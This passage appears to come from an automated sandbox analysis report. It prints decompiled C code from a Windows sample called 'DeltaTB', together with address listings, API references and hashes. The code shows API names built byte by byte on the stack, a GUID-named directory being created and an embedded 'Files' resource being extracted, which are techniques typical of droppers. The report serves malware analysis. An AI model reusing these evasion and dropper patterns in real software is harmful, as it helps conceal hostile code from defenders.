					 *((char*)(_t405 - 0x30)) = 0x46;
					 *((char*)(_t405 - 0x2f)) = 0x69;
					 *((char*)(_t405 - 0x2e)) = 0x72;
					 *((char*)(_t405 - 0x2d)) = 0x73;
					 *((char*)(_t405 - 0x2c)) = 0x74;
					 *((char*)(_t405 - 0x2b)) = 0x46;
					 *((char*)(_t405 - 0x2a)) = 0x69;
					 *((char*)(_t405 - 0x29)) = 0x6c;
					 *((char*)(_t405 - 0x28)) = 0x65;
					 *((char*)(_t405 - 0x27)) = 0x57;
					 *((char*)(_t405 - 0x26)) = 0;
					 *((intOrPtr*)(__esi + 0x30)) =  *(__esi + 4)();
					 *((char*)(_t405 + 0x5c)) = 0x46;
					 *((char*)(_t405 + 0x5d)) = 0x69;
					 *((char*)(_t405 + 0x5e)) = 0x6e;
					 *((char*)(_t405 + 0x5f)) = 0x64;
					 *((char*)(_t405 + 0x60)) = 0x43;
					 *((char*)(_t405 + 0x61)) = 0x6c;
					 *((char*)(_t405 + 0x62)) = 0x6f;
					 *((char*)(_t405 + 0x63)) = 0x73;
					 *((char*)(_t405 + 0x64)) = 0x65;
					 *((char*)(_t405 + 0x65)) = 0;
					_push(_t405 + 0x5c);
					_push(_t402);
					 *((intOrPtr*)(__esi + 0x34)) =  *(__esi + 4)();
					_push(_t405 - 0x44);
					_push(_t402);
					 *((char*)(_t405 - 0x44)) = 0x47;
					 *((char*)(_t405 - 0x43)) = 0x65;
					 *((char*)(_t405 - 0x42)) = 0x74;
					 *((char*)(_t405 - 0x41)) = 0x43;
					 *((char*)(_t405 - 0x40)) = 0x6f;
					 *((char*)(_t405 - 0x3f)) = 0x6d;
					 *((char*)(_t405 - 0x3e)) = 0x6d;
					 *((char*)(_t405 - 0x3d)) = 0x61;
					 *((char*)(_t405 - 0x3c)) = 0x6e;
					 *((char*)(_t405 - 0x3b)) = 0x64;
					 *((char*)(_t405 - 0x3a)) = 0x4c;
					 *((char*)(_t405 - 0x39)) = 0x69;
					 *((char*)(_t405 - 0x38)) = 0x6e;
					 *((char*)(_t405 - 0x37)) = 0x65;
					 *((char*)(_t405 - 0x36)) = 0x57;
					 *((char*)(_t405 - 0x35)) = 0;
					 *((intOrPtr*)(__esi + 0x38)) =  *(__esi + 4)();
					_push(_t405 - 0x68);
					_push(_t402);
					 *((char*)(_t405 - 0x68)) = 0x47;
					 *((char*)(_t405 - 0x67)) = 0x65;
					 *((char*)(_t405 - 0x66)) = 0x74;
					 *((char*)(_t405 - 0x65)) = 0x4d;
					 *((char*)(_t405 - 0x64)) = 0x6f;
					 *((char*)(_t405 - 0x63)) = 0x64;
					 *((char*)(_t405 - 0x62)) = 0x75;
					 *((char*)(_t405 - 0x61)) = 0x6c;
					 *((char*)(_t405 - 0x60)) = 0x65;
					 *((char*)(_t405 - 0x5f)) = 0x48;
					 *((char*)(_t405 - 0x5e)) = 0x61;
					 *((char*)(_t405 - 0x5d)) = 0x6e;
					 *((char*)(_t405 - 0x5c)) = 0x64;
					 *((char*)(_t405 - 0x5b)) = 0x6c;
					 *((char*)(_t405 - 0x5a)) = 0x65;
					 *((char*)(_t405 - 0x59)) = 0x57;
					 *((char*)(_t405 - 0x58)) = 0;
					 *((intOrPtr*)(__esi + 0x3c)) =  *(__esi + 4)();
					_push(_t405 + 0x1c);
					_push(_t402);
					 *((char*)(_t405 + 0x1c)) = 0x47;
					 *((char*)(_t405 + 0x1d)) = 0x65;
					 *((char*)(_t405 + 0x1e)) = 0x74;
					 *((char*)(_t405 + 0x1f)) = 0x4c;
					 *((char*)(_t405 + 0x20)) = 0x61;
					 *((char*)(_t405 + 0x21)) = 0x73;
					 *((char*)(_t405 + 0x22)) = 0x74;
					 *((char*)(_t405 + 0x23)) = 0x45;
					 *((char*)(_t405 + 0x24)) = 0x72;
					 *((char*)(_t405 + 0x25)) = 0x72;
					 *((char*)(_t405 + 0x26)) = 0x6f;
					 *((char*)(_t405 + 0x27)) = 0x72;
					 *((char*)(_t405 + 0x28)) = 0;
					 *((intOrPtr*)(__esi + 0x40)) =  *(__esi + 4)();
				}
				_pop(_t403);
				_pop(_t392);
				return E009A3BC5(_t404, _t392,  *(_t405 + 0x74) ^ _t405, _t400, _t403, _t404);
			}
















                                                                                                                                                              0x009a1b83
                                                                                                                                                              0x009a1b84
                                                                                                                                                              0x009a1b95
                                                                                                                                                              0x009a1ba5
                                                                                                                                                              0x009a1bab
                                                                                                                                                              0x009a1bb6
                                                                                                                                                              0x009a1bba
                                                                                                                                                              0x009a1bbe
                                                                                                                                                              0x009a1bc2
                                                                                                                                                              0x009a1bc6
                                                                                                                                                              0x009a1bca
                                                                                                                                                              0x009a1bce
                                                                                                                                                              0x009a1bd2
                                                                                                                                                              0x009a1bd6
                                                                                                                                                              0x009a1bda
                                                                                                                                                              0x009a1bde
                                                                                                                                                              0x009a1be2
                                                                                                                                                              0x009a1be6
                                                                                                                                                              0x009a1bea
                                                                                                                                                              0x009a1bee
                                                                                                                                                              0x009a1bf1
                                                                                                                                                              0x009a1bfc
                                                                                                                                                              0x009a1bff
                                                                                                                                                              0x009a1c03
                                                                                                                                                              0x009a1c07
                                                                                                                                                              0x009a1c0b
                                                                                                                                                              0x009a1c0f
                                                                                                                                                              0x009a1c13
                                                                                                                                                              0x009a1c17
                                                                                                                                                              0x009a1c1b
                                                                                                                                                              0x009a1c1f
                                                                                                                                                              0x009a1c23
                                                                                                                                                              0x009a1c27
                                                                                                                                                              0x009a1c2b
                                                                                                                                                              0x009a1c2f
                                                                                                                                                              0x009a1c38
                                                                                                                                                              0x009a1c3a
                                                                                                                                                              0x009a1c3e
                                                                                                                                                              0x009a1c42
                                                                                                                                                              0x009a1c46
                                                                                                                                                              0x009a1c4a
                                                                                                                                                              0x009a1c4e
                                                                                                                                                              0x009a1c52
                                                                                                                                                              0x009a1c56
                                                                                                                                                              0x009a1c5a
                                                                                                                                                              0x009a1c5e
                                                                                                                                                              0x009a1c61
                                                                                                                                                              0x009a1c65
                                                                                                                                                              0x009a1c69
                                                                                                                                                              0x009a1c6d
                                                                                                                                                              0x009a1c71
                                                                                                                                                              0x009a1c75
                                                                                                                                                              0x009a1c79
                                                                                                                                                              0x009a1c7d
                                                                                                                                                              0x009a1c81
                                                                                                                                                              0x009a1c85
                                                                                                                                                              0x009a1c89
                                                                                                                                                              0x009a1c8d
                                                                                                                                                              0x009a1c91
                                                                                                                                                              0x009a1c94
                                                                                                                                                              0x009a1c99
                                                                                                                                                              0x009a1c9a
                                                                                                                                                              0x009a1c9e
                                                                                                                                                              0x009a1ca1
                                                                                                                                                              0x009a1ca5
                                                                                                                                                              0x009a1ca9
                                                                                                                                                              0x009a1cad
                                                                                                                                                              0x009a1cb1
                                                                                                                                                              0x009a1cb5
                                                                                                                                                              0x009a1cb9
                                                                                                                                                              0x009a1cbd
                                                                                                                                                              0x009a1cc1
                                                                                                                                                              0x009a1cc5
                                                                                                                                                              0x009a1cc9
                                                                                                                                                              0x009a1ccc
                                                                                                                                                              0x009a1cd3
                                                                                                                                                              0x009a1cd4
                                                                                                                                                              0x009a1cd8
                                                                                                                                                              0x009a1cdc
                                                                                                                                                              0x009a1ce0
                                                                                                                                                              0x009a1ce4
                                                                                                                                                              0x009a1ce8
                                                                                                                                                              0x009a1cec
                                                                                                                                                              0x009a1cf0
                                                                                                                                                              0x009a1cf4
                                                                                                                                                              0x009a1cf8
                                                                                                                                                              0x009a1cfc
                                                                                                                                                              0x009a1cff
                                                                                                                                                              0x009a1d04
                                                                                                                                                              0x009a1d05
                                                                                                                                                              0x009a1d09
                                                                                                                                                              0x009a1d12
                                                                                                                                                              0x009a1d13
                                                                                                                                                              0x009a1d14
                                                                                                                                                              0x009a1d1b
                                                                                                                                                              0x009a1d22
                                                                                                                                                              0x009a1d29
                                                                                                                                                              0x009a1d30
                                                                                                                                                              0x009a1d37
                                                                                                                                                              0x009a1d3e
                                                                                                                                                              0x009a1d45
                                                                                                                                                              0x009a1d4c
                                                                                                                                                              0x009a1d53
                                                                                                                                                              0x009a1d5a
                                                                                                                                                              0x009a1d61
                                                                                                                                                              0x009a1d68
                                                                                                                                                              0x009a1d6f
                                                                                                                                                              0x009a1d76
                                                                                                                                                              0x009a1d7d
                                                                                                                                                              0x009a1d84
                                                                                                                                                              0x009a1d8a
                                                                                                                                                              0x009a1d90
                                                                                                                                                              0x009a1d91
                                                                                                                                                              0x009a1d92
                                                                                                                                                              0x009a1d96
                                                                                                                                                              0x009a1d9a
                                                                                                                                                              0x009a1d9e
                                                                                                                                                              0x009a1da2
                                                                                                                                                              0x009a1da6
                                                                                                                                                              0x009a1daa
                                                                                                                                                              0x009a1dae
                                                                                                                                                              0x009a1db2
                                                                                                                                                              0x009a1db6
                                                                                                                                                              0x009a1dba
                                                                                                                                                              0x009a1dbe
                                                                                                                                                              0x009a1dc2
                                                                                                                                                              0x009a1dc8
                                                                                                                                                              0x009a1dcb
                                                                                                                                                              0x009a1dd2
                                                                                                                                                              0x009a1dd9
                                                                                                                                                              0x009a1de0
                                                                                                                                                              0x009a1de7
                                                                                                                                                              0x009a1dee
                                                                                                                                                              0x009a1df5
                                                                                                                                                              0x009a1dfc
                                                                                                                                                              0x009a1e03
                                                                                                                                                              0x009a1e0a
                                                                                                                                                              0x009a1e11
                                                                                                                                                              0x009a1e18
                                                                                                                                                              0x009a1e1f
                                                                                                                                                              0x009a1e26
                                                                                                                                                              0x009a1e2d
                                                                                                                                                              0x009a1e34
                                                                                                                                                              0x009a1e3b
                                                                                                                                                              0x009a1e42
                                                                                                                                                              0x009a1e49
                                                                                                                                                              0x009a1e50
                                                                                                                                                              0x009a1e57
                                                                                                                                                              0x009a1e5e
                                                                                                                                                              0x009a1e6b
                                                                                                                                                              0x009a1e6c
                                                                                                                                                              0x009a1e6d
                                                                                                                                                              0x009a1e74
                                                                                                                                                              0x009a1e7b
                                                                                                                                                              0x009a1e84
                                                                                                                                                              0x009a1e8a
                                                                                                                                                              0x009a1e8b
                                                                                                                                                              0x009a1e8c
                                                                                                                                                              0x009a1e90
                                                                                                                                                              0x009a1e94
                                                                                                                                                              0x009a1e98
                                                                                                                                                              0x009a1e9c
                                                                                                                                                              0x009a1ea0
                                                                                                                                                              0x009a1ea4
                                                                                                                                                              0x009a1ea8
                                                                                                                                                              0x009a1eac
                                                                                                                                                              0x009a1eb0
                                                                                                                                                              0x009a1eb4
                                                                                                                                                              0x009a1eb8
                                                                                                                                                              0x009a1ebc
                                                                                                                                                              0x009a1ec0
                                                                                                                                                              0x009a1ec4
                                                                                                                                                              0x009a1ec8
                                                                                                                                                              0x009a1ece
                                                                                                                                                              0x009a1ed5
                                                                                                                                                              0x009a1ed9
                                                                                                                                                              0x009a1edd
                                                                                                                                                              0x009a1ee1
                                                                                                                                                              0x009a1ee5
                                                                                                                                                              0x009a1ee9
                                                                                                                                                              0x009a1eed
                                                                                                                                                              0x009a1ef1
                                                                                                                                                              0x009a1ef5
                                                                                                                                                              0x009a1ef9
                                                                                                                                                              0x009a1efd
                                                                                                                                                              0x009a1f01
                                                                                                                                                              0x009a1f04
                                                                                                                                                              0x009a1f08
                                                                                                                                                              0x009a1f0c
                                                                                                                                                              0x009a1f10
                                                                                                                                                              0x009a1f14
                                                                                                                                                              0x009a1f18
                                                                                                                                                              0x009a1f1c
                                                                                                                                                              0x009a1f20
                                                                                                                                                              0x009a1f24
                                                                                                                                                              0x009a1f28
                                                                                                                                                              0x009a1f2c
                                                                                                                                                              0x009a1f30
                                                                                                                                                              0x009a1f34
                                                                                                                                                              0x009a1f38
                                                                                                                                                              0x009a1f3c
                                                                                                                                                              0x009a1f40
                                                                                                                                                              0x009a1f44
                                                                                                                                                              0x009a1f47
                                                                                                                                                              0x009a1f4c
                                                                                                                                                              0x009a1f4d
                                                                                                                                                              0x009a1f51
                                                                                                                                                              0x009a1f54
                                                                                                                                                              0x009a1f5b
                                                                                                                                                              0x009a1f62
                                                                                                                                                              0x009a1f69
                                                                                                                                                              0x009a1f70
                                                                                                                                                              0x009a1f77
                                                                                                                                                              0x009a1f7e
                                                                                                                                                              0x009a1f85
                                                                                                                                                              0x009a1f8c
                                                                                                                                                              0x009a1f93
                                                                                                                                                              0x009a1f9a
                                                                                                                                                              0x009a1fa1
                                                                                                                                                              0x009a1fa8
                                                                                                                                                              0x009a1faf
                                                                                                                                                              0x009a1fb6
                                                                                                                                                              0x009a1fc3
                                                                                                                                                              0x009a1fc4
                                                                                                                                                              0x009a1fc5
                                                                                                                                                              0x009a1fcc
                                                                                                                                                              0x009a1fd3
                                                                                                                                                              0x009a1fda
                                                                                                                                                              0x009a1fe1
                                                                                                                                                              0x009a1fea
                                                                                                                                                              0x009a1ff3
                                                                                                                                                              0x009a1ff4
                                                                                                                                                              0x009a1ff5
                                                                                                                                                              0x009a1ffc
                                                                                                                                                              0x009a2003
                                                                                                                                                              0x009a200a
                                                                                                                                                              0x009a2011
                                                                                                                                                              0x009a2018
                                                                                                                                                              0x009a201f
                                                                                                                                                              0x009a2026
                                                                                                                                                              0x009a202d
                                                                                                                                                              0x009a2034
                                                                                                                                                              0x009a203b
                                                                                                                                                              0x009a2042
                                                                                                                                                              0x009a2049
                                                                                                                                                              0x009a2050
                                                                                                                                                              0x009a2057
                                                                                                                                                              0x009a205e
                                                                                                                                                              0x009a2065
                                                                                                                                                              0x009a206c
                                                                                                                                                              0x009a2073
                                                                                                                                                              0x009a207c
                                                                                                                                                              0x009a2082
                                                                                                                                                              0x009a2083
                                                                                                                                                              0x009a2084
                                                                                                                                                              0x009a2088
                                                                                                                                                              0x009a208c
                                                                                                                                                              0x009a2090
                                                                                                                                                              0x009a2094
                                                                                                                                                              0x009a2098
                                                                                                                                                              0x009a209c
                                                                                                                                                              0x009a20a0
                                                                                                                                                              0x009a20a4
                                                                                                                                                              0x009a20a8
                                                                                                                                                              0x009a20ac
                                                                                                                                                              0x009a20b0
                                                                                                                                                              0x009a20b6
                                                                                                                                                              0x009a20bc
                                                                                                                                                              0x009a20bd
                                                                                                                                                              0x009a20be
                                                                                                                                                              0x009a20c2
                                                                                                                                                              0x009a20c6
                                                                                                                                                              0x009a20ca
                                                                                                                                                              0x009a20ce
                                                                                                                                                              0x009a20d2
                                                                                                                                                              0x009a20d6
                                                                                                                                                              0x009a20da
                                                                                                                                                              0x009a20de
                                                                                                                                                              0x009a20e2
                                                                                                                                                              0x009a20e6
                                                                                                                                                              0x009a20ea
                                                                                                                                                              0x009a20ee
                                                                                                                                                              0x009a20f2
                                                                                                                                                              0x009a20f6
                                                                                                                                                              0x009a20fc
                                                                                                                                                              0x009a20ff
                                                                                                                                                              0x009a2103
                                                                                                                                                              0x009a2107
                                                                                                                                                              0x009a210b
                                                                                                                                                              0x009a210f
                                                                                                                                                              0x009a2113
                                                                                                                                                              0x009a2117
                                                                                                                                                              0x009a211b
                                                                                                                                                              0x009a211f
                                                                                                                                                              0x009a2123
                                                                                                                                                              0x009a2129
                                                                                                                                                              0x009a212a
                                                                                                                                                              0x009a212e
                                                                                                                                                              0x009a2134
                                                                                                                                                              0x009a2135
                                                                                                                                                              0x009a2136
                                                                                                                                                              0x009a213a
                                                                                                                                                              0x009a213e
                                                                                                                                                              0x009a2142
                                                                                                                                                              0x009a2146
                                                                                                                                                              0x009a214a
                                                                                                                                                              0x009a214e
                                                                                                                                                              0x009a2152
                                                                                                                                                              0x009a2156
                                                                                                                                                              0x009a215a
                                                                                                                                                              0x009a215e
                                                                                                                                                              0x009a2162
                                                                                                                                                              0x009a2166
                                                                                                                                                              0x009a216a
                                                                                                                                                              0x009a216e
                                                                                                                                                              0x009a2172
                                                                                                                                                              0x009a2178
                                                                                                                                                              0x009a217e
                                                                                                                                                              0x009a217f
                                                                                                                                                              0x009a2180
                                                                                                                                                              0x009a2184
                                                                                                                                                              0x009a2188
                                                                                                                                                              0x009a218c
                                                                                                                                                              0x009a2190
                                                                                                                                                              0x009a2194
                                                                                                                                                              0x009a2198
                                                                                                                                                              0x009a219c
                                                                                                                                                              0x009a21a0
                                                                                                                                                              0x009a21a4
                                                                                                                                                              0x009a21a8
                                                                                                                                                              0x009a21ac
                                                                                                                                                              0x009a21b0
                                                                                                                                                              0x009a21b4
                                                                                                                                                              0x009a21b8
                                                                                                                                                              0x009a21bc
                                                                                                                                                              0x009a21c0
                                                                                                                                                              0x009a21c6
                                                                                                                                                              0x009a21cc
                                                                                                                                                              0x009a21cd
                                                                                                                                                              0x009a21ce
                                                                                                                                                              0x009a21d2
                                                                                                                                                              0x009a21d6
                                                                                                                                                              0x009a21da
                                                                                                                                                              0x009a21de
                                                                                                                                                              0x009a21e2
                                                                                                                                                              0x009a21e6
                                                                                                                                                              0x009a21ea
                                                                                                                                                              0x009a21ee
                                                                                                                                                              0x009a21f2
                                                                                                                                                              0x009a21f6
                                                                                                                                                              0x009a21fa
                                                                                                                                                              0x009a21fe
                                                                                                                                                              0x009a2204
                                                                                                                                                              0x009a2204
                                                                                                                                                              0x009a220a
                                                                                                                                                              0x009a220f
                                                                                                                                                              0x009a2219

                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000000), ref: 009A1B9F
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009A1BF1
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1C94
                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,00000000), ref: 009A1F47
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$AddressProc
                                                                                                                                                              • String ID: Kernel32.dll
                                                                                                                                                              • API String ID: 1469910268-1926710522
                                                                                                                                                              • Opcode ID: f241ade15c52fb00b301d046c89883dc242d2a9841ee368fbd89bb804c9f9921
                                                                                                                                                              • Instruction ID: 3848d1d1dd915602ce1c90171d33704b6d4a4d2d616e9e800b63e3294342fd97
                                                                                                                                                              • Opcode Fuzzy Hash: f241ade15c52fb00b301d046c89883dc242d2a9841ee368fbd89bb804c9f9921
                                                                                                                                                              • Instruction Fuzzy Hash: 0A42771080C7D8DDEB12CB68C9487DEBFE51F22748F0841C995986A292C7FF5A58CB76
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1372 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 187 9a1372-9a138c 188 9a1396-9a13a4 187->188 189 9a13aa-9a13b9 188->189 190 9a14c7-9a14db call 9a3bc5 188->190 194 9a13bb-9a13fb 189->194 195 9a1402-9a142b 189->195 194->195 195->190 197 9a1431-9a14b4 call 9a221a wsprintfW CreateDirectoryW 195->197 197->190 200 9a14b6-9a14c1 197->200 200->188 200->190
                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                              			E009A1372(intOrPtr __edx, intOrPtr __edi) {
				signed int _v8;
				char _v540;
				signed char _v541;
				signed char _v542;
				signed char _v543;
				signed char _v544;
				signed char _v545;
				signed char _v546;
				signed char _v547;
				signed char _v548;
				signed short _v550;
				signed short _v552;
				char _v556;
				signed char _v560;
				void* __ebx;
				void* __esi;
				intOrPtr _t72;
				intOrPtr _t73;
				WCHAR* _t74;
				signed int _t76;
				void* _t77;

				_t73 = __edi;
				_t72 = __edx;
				_v8 =  *0x9a5000 ^ _t76;
				_t69 = 0xb7;
				_v560 = 5;
				while(1) {
					_v560 = _v560 - 1;
					if(_v560 == 0) {
						break;
					}
					_t69 = 3;
					_push( &_v556); // executed
					if( *((intOrPtr*)(_t73 + 8))() != 0) {
						_v556 = 0x1df14869;
						_v548 = 0x87;
						_v547 = 0x2f;
						_v546 = 0x49;
						_v545 = 0x3a;
						_v544 = 0xe;
						_v543 = _v560;
						_v542 = 0xdb;
						_v541 = 0x17;
					}
					_v552 = 0xbab0;
					_v550 = 0x7891;
					_push( &_v540);
					_push(0x104);
					if( *((intOrPtr*)(_t73 + 0x14))() != 0) {
						_t69 = 0;
						E009A221A( &_v540);
						_t74 = _t73 + 0x44;
						wsprintfW(_t74, L"%s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\\",  &_v540, _v556, _v552 & 0x0000ffff, _v550 & 0x0000ffff, _v548 & 0x000000ff, _v547 & 0x000000ff, _v546 & 0x000000ff, _v545 & 0x000000ff, _v544 & 0x000000ff, _v543 & 0x000000ff, _v542 & 0x000000ff, _v541 & 0x000000ff);
						_t77 = _t77 + 0x38;
						if(CreateDirectoryW(_t74, 0) == 0) {
							_t69 =  *((intOrPtr*)(_t73 + 0x40))();
							if(_t67 == 0xb7) {
								continue;
							}
						}
					}
					break;
				}
				return E009A3BC5(0 | _t69 == 0x00000000, _t69, _v8 ^ _t76, _t72, _t73, _t74);
			}
























                                                                                                                                                              0x009a1372
                                                                                                                                                              0x009a1372
                                                                                                                                                              0x009a1382
                                                                                                                                                              0x009a1387
                                                                                                                                                              0x009a138c
                                                                                                                                                              0x009a1396
                                                                                                                                                              0x009a139c
                                                                                                                                                              0x009a13a4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a13ac
                                                                                                                                                              0x009a13b3
                                                                                                                                                              0x009a13b9
                                                                                                                                                              0x009a13c1
                                                                                                                                                              0x009a13cb
                                                                                                                                                              0x009a13d2
                                                                                                                                                              0x009a13d9
                                                                                                                                                              0x009a13e0
                                                                                                                                                              0x009a13e7
                                                                                                                                                              0x009a13ee
                                                                                                                                                              0x009a13f4
                                                                                                                                                              0x009a13fb
                                                                                                                                                              0x009a13fb
                                                                                                                                                              0x009a1407
                                                                                                                                                              0x009a1413
                                                                                                                                                              0x009a1420
                                                                                                                                                              0x009a1421
                                                                                                                                                              0x009a142b
                                                                                                                                                              0x009a1437
                                                                                                                                                              0x009a1439
                                                                                                                                                              0x009a149b
                                                                                                                                                              0x009a14a4
                                                                                                                                                              0x009a14aa
                                                                                                                                                              0x009a14b4
                                                                                                                                                              0x009a14b9
                                                                                                                                                              0x009a14c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a14c1
                                                                                                                                                              0x009a14b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a142b
                                                                                                                                                              0x009a14db

                                                                                                                                                              APIs
                                                                                                                                                              • wsprintfW.USER32 ref: 009A14A4
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A14AF
                                                                                                                                                              Strings
                                                                                                                                                              • %s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\, xrefs: 009A149E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectorywsprintf
                                                                                                                                                              • String ID: %s%08lX-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X\
                                                                                                                                                              • API String ID: 2146621440-1982538544
                                                                                                                                                              • Opcode ID: 9b17950a86dd40dc4c28304f1534c136d534393324aab05b902bbf3b959754bc
                                                                                                                                                              • Instruction ID: 99185ad2f961732fa69ea67ce67f857b4e7acedb8fb545c30f8ed027d3dda5d3
                                                                                                                                                              • Opcode Fuzzy Hash: 9b17950a86dd40dc4c28304f1534c136d534393324aab05b902bbf3b959754bc
                                                                                                                                                              • Instruction Fuzzy Hash: 1C3186719452ACAEDB218BB59C4CBEDBBB85F2E301F0400D5E598A6181C7389F84CFA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009A1000 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 202 9a1000-9a1013 call 9a1372 205 9a101c-9a1032 FindResourceW 202->205 206 9a1015-9a101a 202->206 207 9a104a 205->207 208 9a1034-9a1048 call 9a1b44 205->208 209 9a1097-9a109c 206->209 211 9a104f-9a1051 207->211 208->211 213 9a105a-9a1073 call 9a17f0 211->213 214 9a1053-9a1058 211->214 217 9a1081-9a1089 call 9a1985 213->217 218 9a1075-9a107f call 9a17bc 213->218 214->209 222 9a108e-9a1092 217->222 218->209 222->209
                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E009A1000(intOrPtr __eax, void* __ecx, intOrPtr __edx, void* __eflags) {
				char _v8;
				char _v12;
				void* __edi;
				void* __esi;
				void* _t8;
				void* _t10;
				void* _t12;
				signed int _t13;
				signed int _t15;
				intOrPtr _t24;

				_t22 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t24 = __eax; // executed
				_t8 = E009A1372(__edx, __eax); // executed
				if(_t8 != 0) {
					_t28 =  *(_t24 + 0x250);
					if(FindResourceW( *(_t24 + 0x250), L"Files", 0xa) == 0) {
						_t10 = 0x716;
					} else {
						_t10 = E009A1B44(_t28,  &_v8,  &_v12, _t9);
					}
					if(_t10 == 0) {
						_t29 = _t24 + 0x254;
						 *(_t24 + 0x254) =  *(_t24 + 0x254) & 0x00000000;
						_t12 = E009A17F0(_v8,  &_v12, _t29); // executed
						if(_t12 == 0) {
							_t13 = E009A1985(_t29, _t22, _t24 + 0x44, 1); // executed
							asm("sbb eax, eax");
							_t15 =  ~_t13 & 0xffffe131;
						} else {
							E009A17BC(_t29);
							_t15 = 0xffffe130;
						}
					} else {
						_t15 = 0xffffe12f;
					}
				} else {
					_t15 = 0xffffe12e;
				}
				return _t15;
			}













                                                                                                                                                              0x009a1000
                                                                                                                                                              0x009a1006
                                                                                                                                                              0x009a1007
                                                                                                                                                              0x009a100a
                                                                                                                                                              0x009a100c
                                                                                                                                                              0x009a1013
                                                                                                                                                              0x009a101c
                                                                                                                                                              0x009a1032
                                                                                                                                                              0x009a104a
                                                                                                                                                              0x009a1034
                                                                                                                                                              0x009a1040
                                                                                                                                                              0x009a1045
                                                                                                                                                              0x009a1051
                                                                                                                                                              0x009a105e
                                                                                                                                                              0x009a1064
                                                                                                                                                              0x009a106c
                                                                                                                                                              0x009a1073
                                                                                                                                                              0x009a1089
                                                                                                                                                              0x009a1090
                                                                                                                                                              0x009a1092
                                                                                                                                                              0x009a1075
                                                                                                                                                              0x009a1075
                                                                                                                                                              0x009a107a
                                                                                                                                                              0x009a107a
                                                                                                                                                              0x009a1053
                                                                                                                                                              0x009a1053
                                                                                                                                                              0x009a1053
                                                                                                                                                              0x009a1015
                                                                                                                                                              0x009a1015
                                                                                                                                                              0x009a1015
                                                                                                                                                              0x009a109c

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 009A1372: wsprintfW.USER32 ref: 009A14A4
                                                                                                                                                                • Part of subcall function 009A1372: CreateDirectoryW.KERNELBASE(?,00000000), ref: 009A14AF
                                                                                                                                                              • FindResourceW.KERNEL32(?,Files,0000000A,?,?,?,?,?,009A1603), ref: 009A102A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.363772667.00000000009A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.363761133.00000000009A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363778301.00000000009A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.363783870.00000000009A6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_9a0000_DeltaTB.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryFindResourcewsprintf
                                                                                                                                                              • String ID: Files
                                                                                                                                                              • API String ID: 975690600-3354685277
                                                                                                                                                              • Opcode ID: 6694fe8ec4199b8573751995cb46a90ab09312f45fa5c9c213d3eed61b72caa3
                                                                                                                                                              • Instruction ID: 0b3bd5f956923c397b6638856d2ccadd5dabad92555480cd0778eb1b9609868f
                                                                                                                                                              • Opcode Fuzzy Hash: 6694fe8ec4199b8573751995cb46a90ab09312f45fa5c9c213d3eed61b72caa3
